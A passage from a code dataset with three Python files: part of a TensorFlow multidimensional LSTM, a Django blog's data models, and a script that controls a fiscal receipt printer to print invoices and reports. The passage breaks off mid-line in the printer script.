state_is_tuple is always True.\n \"\"\"\n\n def __init__(self, num_units, forget_bias=0.0, activation=tf.nn.tanh):\n self._num_units = num_units\n self._forget_bias = forget_bias\n self._activation = activation\n\n @property\n def state_size(self):\n return tf.contrib.rnn.LSTMStateTuple(self._num_units, self._num_units)\n\n @property\n def output_size(self):\n return self._num_units\n\n def __call__(self, inputs, state, scope=None):\n \"\"\"Long short-term memory cell (LSTM).\n @param: imputs (batch,n)\n @param state: the states and hidden unit of the two cells\n \"\"\"\n 
with tf.variable_scope(scope or type(self).__name__):\n c1,c2,h1,h2 = state\n\n # change bias argument to False since LN will add bias via shift\n concat = _linear([inputs, h1, h2], 5 * self._num_units, False)\n\n i, j, f1, f2, o = tf.split(concat, 5, 1)\n\n # add layer normalization to each gate\n i = ln(i, scope = 'i/')\n j = ln(j, scope = 'j/')\n f1 = ln(f1, scope = 'f1/')\n f2 = ln(f2, scope = 'f2/')\n o = ln(o, scope = 'o/')\n\n new_c = (c1 * tf.nn.sigmoid(f1 + self._forget_bias) + \n c2 * tf.nn.sigmoid(f2 + self._forget_bias) + tf.nn.sigmoid(i) *\n self._activation(j))\n\n # add layer_normalization in calculation of new hidden state\n new_h = self._activation(ln(new_c, scope = 'new_h/')) * tf.nn.sigmoid(o)\n new_state = tf.contrib.rnn.LSTMStateTuple(new_c, new_h)\n\n return new_h, new_state\n\n \ndef multiDimentionalRNN_whileLoop(rnn_size,input_data,sh,dims=None,scopeN=\"layer1\"):\n \"\"\"Implements naive multidimentional recurent neural networks\n \n @param rnn_size: the hidden units\n @param input_data: the data to process of shape [batch,h,w,chanels]\n @param sh: [heigth,width] of the windows \n @param dims: dimentions to reverse the input data\n @param scopeN : the scope\n \n returns [batch,h/sh[0],w/sh[1],chanels*sh[0]*sh[1]] the output of the lstm\n \"\"\"\n with tf.variable_scope(\"MultiDimentionalLSTMCell-\"+scopeN):\n cell = MultiDimentionalLSTMCell(rnn_size)\n \n shape = input_data.get_shape().as_list()\n\n if shape[1]%sh[0] != 0:\n offset = tf.zeros([shape[0], sh[0]-(shape[1]%sh[0]), shape[2], shape[3]])\n input_data = tf.concat([input_data,offset],1)\n shape = input_data.get_shape().as_list()\n if shape[2]%sh[1] != 0:\n offset = tf.zeros([shape[0], shape[1], sh[1]-(shape[2]%sh[1]), shape[3]])\n input_data = tf.concat([input_data,offset],2)\n shape = input_data.get_shape().as_list()\n\n h,w = int(shape[1]/sh[0]),int(shape[2]/sh[1])\n features = sh[1]*sh[0]*shape[3]\n batch_size = shape[0]\n\n lines = tf.split(input_data,h,axis=1)\n x1 = []\n for line in lines:#shape[0], sh[0], shape[2], shape[3] - bs, sh[0], total width, chanels\n line = tf.transpose(line,[0,2,3,1])\n line = tf.reshape(line,[batch_size,w,features])\n x1.append(line)\n x = tf.stack(x1,axis=1)\n if dims is not None:\n x = tf.reverse(x, dims)\n x = tf.transpose(x, [1,2,0,3])\n x = tf.reshape(x, [-1, features])\n x = tf.split(x, h*w, 0) \n\n sequence_length = tf.ones(shape=(batch_size,), dtype=tf.int32)*shape[0]\n inputs_ta = tf.TensorArray(dtype=tf.float32, size=h*w,name='input_ta')\n inputs_ta = inputs_ta.unstack(x)\n states_ta = tf.TensorArray(dtype=tf.float32, size=h*w+1,name='state_ta',\n clear_after_read=False)\n outputs_ta = tf.TensorArray(dtype=tf.float32, size=h*w,name='output_ta')\n\n states_ta = states_ta.write(h*w, \n tf.contrib.rnn.LSTMStateTuple(\n tf.zeros([batch_size,rnn_size], tf.float32),\n tf.zeros([batch_size,rnn_size],\n tf.float32)))\n def getindex1(t,w):\n return tf.cond(tf.less_equal(tf.constant(w),t),\n lambda:t-tf.constant(w),\n lambda:tf.constant(h*w))\n def getindex2(t,w):\n return tf.cond(tf.less(tf.constant(0),tf.mod(t,tf.constant(w))),\n lambda:t-tf.constant(1),\n lambda:tf.constant(h*w))\n\n time = tf.constant(0)\n\n def body(time, outputs_ta, states_ta):\n constant_val = tf.constant(0)\n stateUp = tf.cond(tf.less_equal(tf.constant(w),time),\n lambda: states_ta.read(getindex1(time,w)),\n lambda: states_ta.read(h*w))\n stateLast = tf.cond(tf.less(constant_val,tf.mod(time,tf.constant(w))),\n lambda: states_ta.read(getindex2(time,w)),\n lambda: states_ta.read(h*w)) \n\n 
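# --- Editor's note: the two tf.cond blocks above fetch the neighbour
# states for grid position t. getindex1 points one full row up (t - w) and
# getindex2 one column left (t - 1); both fall back to slot h*w, which was
# pre-filled with a zero LSTMStateTuple, whenever the neighbour would lie
# outside the grid (first row / first column). The 4-tuple built next is
# ordered (c_up, c_left, h_up, h_left) to match `c1, c2, h1, h2 = state`
# in MultiDimentionalLSTMCell.__call__.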
currentState = stateUp[0],stateLast[0],stateUp[1],stateLast[1]\n out , state = cell(inputs_ta.read(time),currentState) \n outputs_ta = outputs_ta.write(time,out)\n states_ta = states_ta.write(time,state)\n return time + 1, outputs_ta, states_ta\n\n def condition(time,outputs_ta,states_ta):\n return tf.less(time , tf.constant(h*w)) \n\n result , outputs_ta, states_ta = tf.while_loop(condition, body, [time,outputs_ta,states_ta]\n ,parallel_iterations=1)\n\n\n outputs = outputs_ta.stack()\n states = states_ta.stack()\n\n y = tf.reshape(outputs, [h,w,batch_size,rnn_size])\n y = tf.transpose(y, [2,0,1,3])\n if dims is not None:\n y = tf.reverse(y, dims)\n\n return y#,states\n\n \ndef tanAndSum(rnn_size,input_data,scope,sh):\n outs = []\n for i in range(2):\n for j in range(2):\n dims = []\n if i!=0:\n dims.append(1)\n if j!=0:\n dims.append(2) \n outputs = multiDimentionalRNN_whileLoop(rnn_size,input_data,sh,\n dims,scope+\"-multi-l{0}\".format(i*2+j))\n outs.append(outputs)\n #return outs\n outs = tf.stack(outs, axis=0)\n mean = tf.reduce_mean(outs, 0)\n return tf.nn.tanh(mean)\n\n","repo_name":"johnsmithm/mdlstm","sub_path":"mdlstm.py","file_name":"mdlstm.py","file_ext":"py","file_size_in_byte":7897,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"3973021097","text":"from django.contrib.auth import get_user_model\nfrom django.db import models\nfrom django.db.models import UniqueConstraint\n\nUser = get_user_model()\n\n\nclass Posts(models.Model):\n pub_date = models.DateTimeField(\n 'Время публикации',\n auto_now_add=True,\n null=True\n )\n\n class Meta:\n abstract = True\n\n\nclass Group(models.Model):\n title = models.CharField('Название группы', max_length=200)\n slug = models.SlugField('Текст ссылки', unique=True)\n description = models.TextField('Описание группы')\n\n class Meta:\n verbose_name = 'Администрирование группы'\n verbose_name_plural = 'Администрирование групп'\n\n def __str__(self) -> str:\n return self.title\n\n\nclass Post(Posts):\n text = models.TextField('Текст поста', help_text='Введите текст поста')\n author = models.ForeignKey(\n User,\n verbose_name='Автор',\n on_delete=models.CASCADE,\n related_name='posts'\n )\n group = models.ForeignKey(\n Group,\n verbose_name='Группа',\n blank=True,\n null=True,\n on_delete=models.SET_NULL,\n related_name='posts',\n help_text='Группа, к которой будет относиться пост'\n )\n image = models.ImageField(\n 'Картинка',\n upload_to='posts/',\n blank=True,\n null=True,\n )\n\n class Meta:\n verbose_name = 'Администрирование поста'\n verbose_name_plural = 'Администрирование постов'\n ordering = ('-pub_date',)\n\n def __str__(self) -> str:\n return self.text[:15]\n\n\nclass Comment(Posts):\n post = models.ForeignKey(\n Post,\n verbose_name='Пост',\n on_delete=models.CASCADE,\n related_name='comments'\n )\n author = models.ForeignKey(\n User,\n verbose_name='Автор',\n on_delete=models.CASCADE,\n related_name='comments'\n )\n text = models.TextField(\n 'Текст комментария',\n help_text='Введите текст комментария'\n )\n\n class Meta:\n verbose_name = 'Администрирование комментария'\n verbose_name_plural = 'Администрирование комментариев'\n ordering = ('-pub_date',)\n\n def __str__(self) -> str:\n return self.text[:15]\n\n\nclass Follow(models.Model):\n user = models.ForeignKey(\n User,\n verbose_name='Подписчик',\n on_delete=models.CASCADE,\n related_name='follower'\n )\n author = models.ForeignKey(\n User,\n verbose_name='Автор',\n on_delete=models.CASCADE,\n 
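# --- Editor's note (not part of the dataset records): the ln() helper in
# the mdlstm record above implements standard layer normalization over the
# feature axis, LN(x) = (x - mean) / sqrt(var + eps) * scale + shift, with
# scale initialized to 1 and shift to 0 so the op starts as near identity.
# A NumPy sketch of the same computation for a quick sanity check; scale
# and shift are learned per-feature vectors in the record, scalars here
# for brevity:
import numpy as np

def layer_norm(x, scale=1.0, shift=0.0, eps=1e-5):
    m = x.mean(axis=1, keepdims=True)   # per-row mean over features
    v = x.var(axis=1, keepdims=True)    # per-row variance over features
    return (x - m) / np.sqrt(v + eps) * scale + shift

x = np.random.randn(4, 8)
y = layer_norm(x)
assert np.allclose(y.mean(axis=1), 0.0, atol=1e-6)  # rows are normalized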
related_name='following'\n    )\n\n    class Meta:\n        verbose_name = 'Администрирование подписки'\n        verbose_name_plural = 'Администрирование подписок'\n        constraints = [\n            UniqueConstraint(fields=['user', 'author'], name='unique_following')\n        ]\n\n    def __str__(self) -> str:\n        return f'{self.user} -> {self.author}'\n","repo_name":"kirillkutsko/hw05_final","sub_path":"yatube/posts/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3192,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70674181288","text":"from datetime import (timedelta, datetime as dt, date as pyDate, time as pyTime)\nfrom operator import index\n\nimport sys\nimport Tfhka\nimport serial\nimport os\nimport time\n\nclass Principal():\n\n\tdef __init__(self):\n\t\tself.printer = Tfhka.Tfhka()\n\t\tself.puerto = ['COM3']\n\t\n\tdef abrir_puerto(self):\n\t\tpuerto = self.puerto[0]\n\t\ttry:\n\t\t\tresp = self.printer.OpenFpctrl(puerto)\n\t\t\tif resp:\n\t\t\t\tprint(\"Impresora Conectada Correctamente en: \" + puerto)\n\t\texcept serial.SerialException:\n\t\t\tprint(\"Impresora no Conectada o Error Accediendo al Puerto\")\n\t\n\tdef reconocer_puerto(self):\n\t\tresponse = False\n\t\tfor opciones in ['COM11', 'COM10','COM9', 'COM8', 'COM7', 'COM6', 'COM5', 'COM4', 'COM3']:\n\t\t\ttry:\n\t\t\t\tresp = self.printer.OpenFpctrl(opciones)\n\t\t\t\tif resp:\n\t\t\t\t\tprint(\"Impresora Conectada Correctamente en: \" + opciones)\n\t\t\t\t\tself.puerto[0] = opciones\n\t\t\t\t\tresponse = True\n\t\t\t\t\tbreak\n\t\t\texcept:\n\t\t\t\tcontinue\n\t\treturn response\n\n\tdef cerrar_puerto(self):\n\t\tresp = self.printer.CloseFpctrl()\n\t\tif not resp:\n\t\t\tprint(\"Impresora Desconectada\")\n\t\telse:\n\t\t\tprint(\"Error\")\n\n\tdef programacion(self):\n\t\tself.printer.SendCmd(\"D\")\n\n\tdef enviar_cmd(self):\n\t\tcmd = self.txt_cmd.text()\n\t\tself.printer.SendCmd(str(cmd))\n\n\tdef estado_error(self):\n\t\tself.txt_informacion.setText(\"\")\n\t\tself.estado = self.printer.ReadFpStatus()\n\t\tself.txt_informacion.setText(\"Estado: \" + self.estado[0] + \"\\n\" + \"Error: \" + self.estado[5])\n\n\tdef imprimir_ReporteZ(self):\n\t\tself.printer.PrintZReport()\n\n\tdef imprimir_ReporteX(self):\n\t\tself.printer.PrintXReport()\n\n\tdef obtener_estado(self):\n\t\testado = 'S1'\n\n\t\tif estado == \"S1\":\n\t\t\testado_s1 = self.printer.GetS1PrinterData()\n\t\t\tsalida= \"---Estado S1---\\n\" \n\t\t\tsalida+= \"\\nNumero Cajero: \"+ str(estado_s1._cashierNumber) \n\t\t\tsalida+= \"\\nSubtotal Ventas: \" + str(estado_s1._totalDailySales) \n\t\t\tsalida+= \"\\nNumero Ultima Factura: \" + str(estado_s1._lastInvoiceNumber)\n\t\t\tsalida+= \"\\nCantidad Facturas Hoy: \" + str(estado_s1._quantityOfInvoicesToday) \n\t\t\tsalida+= \"\\nNumero Ultima Nota de Debito: \" + str(estado_s1._lastDebtNoteNumber) \n\t\t\tsalida+= \"\\nCantidad Notas de Debito Hoy: \" + str(estado_s1._quantityDebtNoteToday) \n\t\t\tsalida+= \"\\nNumero Ultima Nota de Credito: \" + str(estado_s1._lastNCNumber) \n\t\t\tsalida+= \"\\nCantidad Notas de Credito Hoy: \" + str(estado_s1._quantityOfNCToday) \n\t\t\tsalida+= \"\\nNumero Ultimo Documento No Fiscal: \" + str(estado_s1._numberNonFiscalDocuments) \n\t\t\tsalida+= \"\\nCantidad de Documentos No Fiscales: \" + str(estado_s1._quantityNonFiscalDocuments) \n\t\t\tsalida+= \"\\nCantidad de Reportes de Auditoria: \" + str(estado_s1._auditReportsCounter) \n\t\t\tsalida+= \"\\nCantidad de Reportes Fiscales: \" + str(estado_s1._fiscalReportsCounter)\n\t\t\tsalida+= \"\\nCantidad de Reportes Z: \" + 
str(estado_s1._dailyClosureCounter)\n\t\t\tsalida+= \"\\nNumero de RIF: \" + str(estado_s1._rif)\n\t\t\tsalida+= \"\\nNumero de Registro: \" + str(estado_s1._registeredMachineNumber)\n\t\t\tsalida+= \"\\nHora de la Impresora: \" + str(estado_s1._currentPrinterTime)\n\t\t\tsalida+= \"\\nFecha de la Impresora: \" + str(estado_s1._currentPrinterDate)\n\t\t\tprint(salida)\n\t\t\t# self.txt_informacion.setText(salida)\n\n\t\tif estado == \"S2\":\n\t\t\testado_s2 = self.printer.GetS2PrinterData()\n\t\t\tsalida= \"---Estado S2---\\n\" \n\t\t\tsalida+= \"\\nSubtotal de BI: \"+ str(estado_s2._subTotalBases) \n\t\t\tsalida+= \"\\nSubtotal de Impuesto: \" + str(estado_s2._subTotalTax) \n\t\t\tsalida+= \"\\nData Dummy: \" + str(estado_s2._dataDummy)\n\t\t\tsalida+= \"\\nCantidad de articulos: \" + str(estado_s2._quantityArticles) \n\t\t\tsalida+= \"\\nMonto por Pagar: \" + str(estado_s2._amountPayable) \n\t\t\tsalida+= \"\\nNumero de Pagos Realizados: \" + str(estado_s2._numberPaymentsMade) \n\t\t\tsalida+= \"\\nTipo de Documento: \" + str(estado_s2._typeDocument) \n\t\t\tself.txt_informacion.setText(salida)\n\n\t\tif estado == \"S3\":\n\t\t\testado_s3 = self.printer.GetS3PrinterData()\n\t\t\tsalida= \"---Estado S3---\\n\"\n\t\t\tsalida+= \"\\nTipo Tasa 1 (1 = Incluido, 2= Excluido): \"+ str(estado_s3._typeTax1) \n\t\t\tsalida+= \"\\nValor Tasa 1: \"+ str(estado_s3._tax1) + \" %\"\n\t\t\tsalida+= \"\\nTipo Tasa 2 (1 = Incluido, 2= Excluido): \" + str(estado_s3._typeTax2) \n\t\t\tsalida+= \"\\nValor Tasa2: \" + str(estado_s3._tax2) + \" %\"\n\t\t\tsalida+= \"\\nTipo Tasa 3 (1 = Incluido, 2= Excluido): \" + str(estado_s3._typeTax3) \n\t\t\tsalida+= \"\\nValor Tasa 3: \" + str(estado_s3._tax3) + \" %\"\n\t\t\tsalida+= \"\\n\\nLista de Flags: \" + str(estado_s3._systemFlags)\n\t\t\tself.txt_informacion.setText(salida)\n\n\t\tif estado == \"S4\":\n\t\t\testado_s4 = self.printer.GetS4PrinterData()\n\t\t\tsalida= \"---Estado S4---\\n\"\n\t\t\tsalida+= \"\\nMontos en Medios de Pago: \" + str(estado_s4._allMeansOfPayment)\n\t\t\tself.txt_informacion.setText(salida)\n\n\t\tif estado == \"S5\":\n\t\t\testado_s5 = self.printer.GetS5PrinterData()\n\t\t\tsalida= \"---Estado S5---\\n\"\n\t\t\tsalida+= \"\\nNumero de RIF: \"+ str(estado_s5._rif) \n\t\t\tsalida+= \"\\nNumero de Registro: \" + str(estado_s5._registeredMachineNumber) \n\t\t\tsalida+= \"\\nNumero de Memoria de Auditoria : \" + str(estado_s5._auditMemoryNumber)\n\t\t\tsalida+= \"\\nCapacidad Total de Memoria Auditoria: \" + str(estado_s5._auditMemoryTotalCapacity) + \" MB\" \n\t\t\tsalida+= \"\\nEspacio Disponible: \" + str(estado_s5._auditMemoryFreeCapacity) + \" MB\" \n\t\t\tsalida+= \"\\nCantidad Documentos Registrados: \" + str(estado_s5._numberRegisteredDocuments)\n\t\t\tself.txt_informacion.setText(salida)\n\n\t\tif estado == \"S6\":\n\t\t\testado_s6 = self.printer.GetS6PrinterData()\n\t\t\tsalida= \"---Estado S6---\\n\"\n\t\t\tsalida+= \"\\nModo Facturacion: \"+ str(estado_s6._bit_Facturacion) \n\t\t\tsalida+= \"\\nModo Slip: \" + str(estado_s6._bit_Slip) \n\t\t\tsalida+= \"\\nModo Validacion: \" + str(estado_s6._bit_Validacion) \n\t\t\tself.txt_informacion.setText(salida)\n\n\tdef obtener_reporteZ(self):\n\t\treporte = self.printer.GetZReport()\n\t\tsalida= \"Numero Ultimo Reporte Z: \"+ str(reporte._numberOfLastZReport) \n\t\tsalida+= \"\\nFecha Ultimo Reporte Z: \"+ str(reporte._zReportDate) \n\t\tsalida+= \"\\nHora Ultimo Reporte Z: \"+ str(reporte._zReportTime) \n\t\tsalida+= \"\\nNumero Ultima Factura: \"+ str(reporte._numberOfLastInvoice) 
\n\t\tsalida+= \"\\nFecha Ultima Factura: \"+ str(reporte._lastInvoiceDate) \n\t\tsalida+= \"\\nHora Ultima Factura: \"+ str(reporte._lastInvoiceTime)\n\t\tsalida+= \"\\nNumero Ultima Nota de Debito: \"+ str(reporte._numberOfLastDebitNote)\n\t\tsalida+= \"\\nNumero Ultima Nota de Credito: \"+ str(reporte._numberOfLastCreditNote)\n\t\tsalida+= \"\\nNumero Ultimo Doc No Fiscal: \"+ str(reporte._numberOfLastNonFiscal)\n\t\tsalida+= \"\\nVentas Exento: \"+ str(reporte._freeSalesTax)\n\t\tsalida+= \"\\nBase Imponible Ventas IVA G: \"+ str(reporte._generalRate1Sale)\n\t\tsalida+= \"\\nImpuesto IVA G: \"+ str(reporte._generalRate1Tax)\n\t\tsalida+= \"\\nBase Imponible Ventas IVA R: \"+ str(reporte._reducedRate2Sale)\n\t\tsalida+= \"\\nImpuesto IVA R: \"+ str(reporte._reducedRate2Tax)\n\t\tsalida+= \"\\nBase Imponible Ventas IVA A: \"+ str(reporte._additionalRate3Sal)\n\t\tsalida+= \"\\nImpuesto IVA A: \"+ str(reporte._additionalRate3Tax)\n\t\tsalida+= \"\\nNota de Debito Exento: \"+ str(reporte._freeTaxDebit)\n\t\tsalida+= \"\\nBI IVA G en Nota de Debito: \"+ str(reporte._generalRateDebit)\n\t\tsalida+= \"\\nImpuesto IVA G en Nota de Debito: \"+ str(reporte._generalRateTaxDebit)\n\t\tsalida+= \"\\nBI IVA R en Nota de Debito: \"+ str(reporte._reducedRateDebit)\n\t\tsalida+= \"\\nImpuesto IVA R en Nota de Debito: \"+ str(reporte._reducedRateTaxDebit)\n\t\tsalida+= \"\\nBI IVA A en Nota de Debito: \"+ str(reporte._additionalRateDebit)\n\t\tsalida+= \"\\nImpuesto IVA A en Nota de Debito: \"+ str(reporte._additionalRateTaxDebit)\n\t\tsalida+= \"\\nNota de Credito Exento: \"+ str(reporte._freeTaxDevolution)\n\t\tsalida+= \"\\nBI IVA G en Nota de Credito: \"+ str(reporte._generalRateDevolution)\n\t\tsalida+= \"\\nImpuesto IVA G en Nota de Credito: \"+ str(reporte._generalRateTaxDevolution)\n\t\tsalida+= \"\\nBI IVA R en Nota de Credito: \"+ str(reporte._reducedRateDevolution)\n\t\tsalida+= \"\\nImpuesto IVA R en Nota de Credito: \"+ str(reporte._reducedRateTaxDevolution)\n\t\tsalida+= \"\\nBI IVA A en Nota de Credito: \"+ str(reporte._additionalRateDevolution)\n\t\tsalida+= \"\\nImpuesto IVA A en Nota de Credito: \"+ str(reporte._additionalRateTaxDevolution)\n\t\tself.txt_informacion.setText(salida)\n\n\tdef obtener_reporteX(self):\n\t\treporte = self.printer.GetXReport()\n\t\treturn reporte\n\n\tdef ImpZpornumero(self):\n\t\tn_ini = self.imp_num_ini.value()\n\t\tn_fin = self.imp_num_fin.value()\n\t\tself.printer.PrintZReport(\"A\",n_ini,n_fin)\n\n\tdef ImpZporfecha(self):\n\t\tn_ini = self.imp_date_ini.date().toPyDate()\n\t\tn_fin = self.imp_date_fin.date().toPyDate()\n\t\tself.printer.PrintZReport(\"A\",n_ini,n_fin)\n\n\tdef factura(self, **params):\t\n\t\tmetodos_pago = {\"TRANSFERENCE\":\"TRANSFERENCIA\", \"MOBILE PAYMENT\":\"PAGO MOVIL\", \"CASH\": \"EFECTIVO\", \"CARD\":\"TARJETA DEBITO\",\\\n\t\t\t \"WALLET\": \"TRANSFERENCIA\", \"CREDIT\": \"CREDITO\"}\n\t\tself.printer.SendCmd(str(f\"i00CLIENTE: {params.get('cliente')}\"))\n\t\tself.printer.SendCmd(str(f\"i01DOCUMENTO: {params.get('documento')}\"))\n\t\tself.printer.SendCmd(str(f\"i02DIRECCION: {params.get('direccion')}\"))\n\t\tself.printer.SendCmd(str(f\"i03TELEFONO: {params.get('telefono')}\"))\n\t\tself.printer.SendCmd(str(f\"i04CAJERO: {params.get('cajero').get('seller')}\"))\n\t\tself.printer.SendCmd(str(f\"i05{params.get('cajero').get('safeBox')}\"))\n\t\tfor producto in params.get(\"lista_productos\"):\n\t\t\tself.printer.SendCmd(producto)\n\t\tself.printer.SendCmd(str(\"3\"))\n\t\tif len(params.get(\"pago\")) > 1:\n\t\t\tfor index, 
metodo in enumerate(params.get(\"pago\"), start=1):\n\t\t\t\tp_entero, p_decimal = metodo.get(\"amount\").split('.')\n\t\t\t\ttipo = metodos_pago.get(metodo.get(\"paymentMethod\"))\n\t\t\t\tself.printer.SendCmd(str(f\"20{index}{(('0') * (10 - len(p_entero))) + p_entero}{p_decimal}{tipo}\")) # Tipo de pago\n\t\telse:\n\t\t\tself.printer.SendCmd(str(f\"101{metodos_pago.get(params.get('pago')[0].get('paymentMethod'))}\"))\n\n\tdef facturaper(self):\n\t\t#Factura Personalizada\n\t\tself.printer.SendCmd(str(\"iR*21.122.012\"))\n\t\tself.printer.SendCmd(str(\"iS*Pedro Perez\"))\n\t\tself.printer.SendCmd(str(\"i00Direccion: Ppal Siempre Viva\"))\n\t\tself.printer.SendCmd(str(\"i01Telefono: +58(212)555-55-55\"))\n\t\tself.printer.SendCmd(str(\"i02CAJERO: 00001\"))\n\t\tself.printer.SendCmd(str(\"@COMMENT/COMENTARIO\"))\n\t\tself.printer.SendCmd(str(\" 000000030000001000Tax Free/Producto Exento\"))\n\t\tself.printer.SendCmd(str(\"!000000050000001000Tax Rate 1/Producto Tasa General\"))\n\t\tself.printer.SendCmd(str('\"' + \"000000070000001000Tax Rate 2/ Producto Tasa Reducida\"))\n\t\tself.printer.SendCmd(str(\"#000000090000001000Tax Rate 3/ Producto Tasa Adicional\"))\n\t\tself.printer.SendCmd(str(\"3\"))\n\t\tself.printer.SendCmd(str(\"101\"))\n\n\tdef facturaanu(self):\n\t\t#Factura Anulada\n\t\tself.printer.SendCmd(str(\"iR*21.122.012\"))\n\t\tself.printer.SendCmd(str(\"iS*Pedro Perez\"))\n\t\tself.printer.SendCmd(str(\"i00Direccion: Ppal Siempre Viva\"))\n\t\tself.printer.SendCmd(str(\"i01Telefono: +58(212)555-55-55\"))\n\t\tself.printer.SendCmd(str(\"i02CAJERO: 00001\"))\n\t\tself.printer.SendCmd(str(\"@COMMENT/COMENTARIO\"))\n\t\tself.printer.SendCmd(str(\" 000000030000001000Tax Free/Producto Exento\"))\n\t\tself.printer.SendCmd(str(\"!000000050000001000Tax Rate 1/Producto Tasa General\"))\n\t\tself.printer.SendCmd(str('\"' + \"000000070000001000Tax Rate 2/ Producto Tasa Reducida\"))\n\t\tself.printer.SendCmd(str(\"#000000090000001000Tax Rate 3/ Producto Tasa Adicional\"))\n\t\tself.printer.SendCmd(str(\"7\"))\n\n\tdef documentoNF(self):\n\t\t#Documento No Fiscal\n\t\tself.printer.SendCmd(str(\"80$Documento de Prueba\"))\n\t\tself.printer.SendCmd(str(\"80¡Esto es un documento de texto\"))\n\t\tself.printer.SendCmd(str(\"80!Es un documento no fiscal\"))\n\t\tself.printer.SendCmd(str(\"80*Es bastante util y versatil\"))\n\t\tself.printer.SendCmd(str(\"810Fin del Documento no Fiscal\"))\n\n\tdef notaCredito(self, **params):\n\t\tmetodos_pago = {\"TRANSFERENCE\":\"TRANSFERENCIA\", \"MOBILE PAYMENT\":\"PAGO MOVIL\", \"CASH\": \"EFECTIVO\", \"CARD\":\"TARJETA DEBITO\",\\\n\t\t\t\t\"WALLET\": \"TRANSFERENCIA\"}\n\t\t#Nota de Credito\n\t\tself.printer.SendCmd(f\"iR*{params.get('documento')}\")\n\t\tself.printer.SendCmd(f\"iS*{params.get('cliente')}\")\n\t\tself.printer.SendCmd(f\"i00TELEFONO: {params.get('telefono')}\")\n\t\tself.printer.SendCmd(f\"i02DIRECCION: {params.get('direccion')}\")\n\t\tself.printer.SendCmd(f\"iF*{params.get('n_factura')}\")\n\t\tself.printer.SendCmd(f\"iD*{dt.now().strftime('%d/%m/%y')}\")\n\t\tself.printer.SendCmd(f\"iI*{params.get('serial')}\")\n\t\tfor producto in params.get(\"lista_productos\"):\n\t\t\tself.printer.SendCmd(producto)\n\t\tself.printer.SendCmd(\"3\")\n\t\tif len(params.get(\"pago\")) > 1:\n\t\t\tfor index, metodo in enumerate(params.get(\"pago\"), start=1):\n\t\t\t\tp_entero, p_decimal = metodo.get(\"amount\").split('.')\n\t\t\t\ttipo = metodos_pago.get(metodo.get(\"paymentMethod\"))\n\t\t\t\tself.printer.SendCmd(str(f\"20{index}{(('0') * (10 - 
len(p_entero))) + p_entero}{p_decimal}{tipo}\")) # Tipo de pago\n\t\telse:\n\t\t\tself.printer.SendCmd(str(f\"101{metodos_pago.get(params.get('pago')[0].get('paymentMethod'))}\"))\n\n\tdef notaDebito(self):\n\t\tself.printer.SendCmd(str(\"iR*21.122.012\"))\n\t\tself.printer.SendCmd(str(\"iS*Pedro Perez\"))\n\t\tself.printer.SendCmd(str(\"iF*00000000001\"))\n\t\tself.printer.SendCmd(str(\"iD*22/08/2016\"))\n\t\tself.printer.SendCmd(str(\"iI*Z1F1234567\"))\n\t\tself.printer.SendCmd(str(\"i00Direccion: Ppal Siempre Viva\"))\n\t\tself.printer.SendCmd(str(\"i01Telefono: +58(212)555-55-55\"))\n\t\tself.printer.SendCmd(str(\"i02CAJERO: 00001\"))\n\t\tself.printer.SendCmd(str(\"BCOMENTARIO NOTA DE DEBITO\"))\n\t\tself.printer.SendCmd(str(\"`0\" + \"000000003000000100Tax Free/Producto Exento\"))\n\t\tself.printer.SendCmd(str(\"`1\" + \"100000005000000100Tax Rate 1/Producto Tasa General\"))\n\t\tself.printer.SendCmd(str(\"`2\" + \"200000007000000100Tax Rate 2/ Producto Tasa Reducida\"))\n\t\tself.printer.SendCmd(str(\"`3\" + \"300000009000000100Tax Rate 3/ Producto Tasa Adicional\"))\n\t\tself.printer.SendCmd(str(\"3\"))\n\t\tself.printer.SendCmd(str(\"101\"))\n\n\tdef ReimprimirFacturas(self, value):\n\t\tvalue = value[1:]\n\t\tn_ini = value\n\t\tn_fin = value\n\n\t\tstarString = str(n_ini)\n\t\twhile (len(starString) < 7):\n\t\t\tstarString = \"0\" + starString\n\t\tendString = str(n_fin)\n\t\twhile (len(endString) < 7):\n\t\t\tendString = \"0\" + endString\n\t\tself.printer.SendCmd(\"RF\" + starString + endString)\n\n\tdef ObtZpornumero(self):\n\t\tn_ini = self.obt_num_ini.value()\n\t\tn_fin = self.obt_num_fin.value()\n\t\treportes = self.printer.GetZReport(\"A\",n_ini,n_fin)\n\t\tCR = len(reportes)\n\t\tEnc = \"Lista de Reportes\\n\"+\"\\n\"\n\t\tsalida = \"\"\n\t\tfor NR in range(CR):\n\t\t\tsalida+= \"Numero de Reporte Z: \"+ str(reportes[NR]._numberOfLastZReport)\n\t\t\tsalida+= \"\\nFecha Ultimo Reporte Z: \"+ str(reportes[NR]._zReportDate)\n\t\t\tsalida+= \"\\nHora Ultimo Reporte Z: \"+ str(reportes[NR]._zReportTime)\n\t\t\tsalida+= \"\\nNumero Ultima Factura: \"+ str(reportes[NR]._numberOfLastInvoice)\n\t\t\tsalida+= \"\\nFecha Ultima Factura: \"+ str(reportes[NR]._lastInvoiceDate)\n\t\t\tsalida+= \"\\nHora Ultima Factura: \"+ str(reportes[NR]._lastInvoiceTime)\n\t\t\tsalida+= \"\\nNumero Ultima Nota de Credito: \"+ str(reportes[NR]._numberOfLastCreditNote)\n\t\t\tsalida+= \"\\nNumero Ultima Nota de Debito: \"+ str(reportes[NR]._numberOfLastDebitNote)\n\t\t\tsalida+= \"\\nNumero Ultimo Doc No Fiscal: \"+ str(reportes[NR]._numberOfLastNonFiscal)\n\t\t\tsalida+= \"\\nVentas Exento: \"+ str(reportes[NR]._freeSalesTax)\n\t\t\tsalida+= \"\\nBase Imponible Ventas IVA G: \"+ str(reportes[NR]._generalRate1Sale)\n\t\t\tsalida+= \"\\nImpuesto IVA G: \"+ str(reportes[NR]._generalRate1Tax)\n\t\t\tsalida+= \"\\nBase Imponible Ventas IVA R: \"+ str(reportes[NR]._reducedRate2Sale)\n\t\t\tsalida+= \"\\nImpuesto IVA R: \"+ str(reportes[NR]._reducedRate2Tax)\n\t\t\tsalida+= \"\\nBase Imponible Ventas IVA A: \"+ str(reportes[NR]._additionalRate3Sal)\n\t\t\tsalida+= \"\\nImpuesto IVA A: \"+ str(reportes[NR]._additionalRate3Tax)\n\t\t\tsalida+= \"\\nNota de Debito Exento: \"+ str(reportes[NR]._freeTaxDebit)\n\t\t\tsalida+= \"\\nBI IVA G en Nota de Debito: \"+ str(reportes[NR]._generalRateDebit)\n\t\t\tsalida+= \"\\nImpuesto IVA G en 